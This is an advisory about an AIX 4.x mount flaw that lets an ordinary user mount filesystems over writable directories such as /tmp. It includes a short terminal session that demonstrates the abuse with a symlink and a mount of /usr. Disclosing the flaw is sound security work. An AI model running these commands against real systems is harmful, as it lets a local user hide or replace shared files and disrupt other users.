COMMAND

    mount

SYSTEMS AFFECTED

    AIX 4.x (tested on 4.1.3, 4.1.4, 4.2.0, 4.2.1)

PROBLEM

    S. Ryan  Quick posted  following.   There is  a problem with mount
    which  allows  a  normal  user  to mount any filesystem (including
    those already mounted by the system) on top of any writable space.
    Immediately, as  the script  below shows,  this allows  a user  to
    overwrite the contents of 777 directories with whatever files  one
    wants.  (e.g. Removing access to temporary files in /tmp) . . .

	sapphire /home/rquick > oslevel
	4.1.4.0
	sapphire /home/rquick > who am i
	rquick    pts/2
	sapphire /home/rquick > id
	uid=20653(rquick) gid=101(comtec)
	sapphire /home/rquick > ln -s /tmp mnt
	sapphire /home/rquick > mount /usr mnt
	sapphire /home/rquick > cd /tmp
	sapphire /tmp > ls
	OV           dict         include      lpd          sbin         ucb
	adm          dt           lbin         lpp          share        usg
	bin          ebt          lib          man          spool
	ccs          eligibility  local        pub          sys
	common       etc          lost+found   samples      tmp
	sapphire /tmp > cd
	sapphire /home/rquick > umount mnt
	sapphire /home/rquick >

SOLUTION

    This has  been fixed  in the  gold release  of AIX  4.3.0.   To my
    knowledge, there are no current plans to backport this fix.